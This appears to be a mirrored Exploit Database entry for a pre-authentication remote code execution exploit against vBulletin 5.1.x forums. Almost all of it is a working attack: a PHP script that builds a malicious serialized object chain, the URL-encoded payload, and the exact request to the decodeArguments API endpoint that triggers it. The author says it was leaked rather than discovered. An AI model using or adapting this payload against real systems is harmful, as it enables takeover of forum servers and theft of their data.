vBulletin 5.1.x – Remote Code Execution

• Exploit Database
• 140 阅读

• 作者： hhjj
  日期： 2015-11-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38629/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  # Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit # Date: Nov 4th, 2015 # Exploit Author: hhjj # Vendor Homepage: http://www.vbulletin.com/ # Version: 5.1.x # Tested on: Debian # CVE : # I did not discover this exploit, leaked from the IoT.   # Build the object php << &apos;eof&apos; <?php class vB_Database { public $functions = array();   public function __construct() { $this->functions[&apos;free_result&apos;] = &apos;phpinfo&apos;; } }   class vB_dB_Result { protected $db; protected $recordset;   public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } }   print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D   #Then hit decodeArguments with your payload : http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D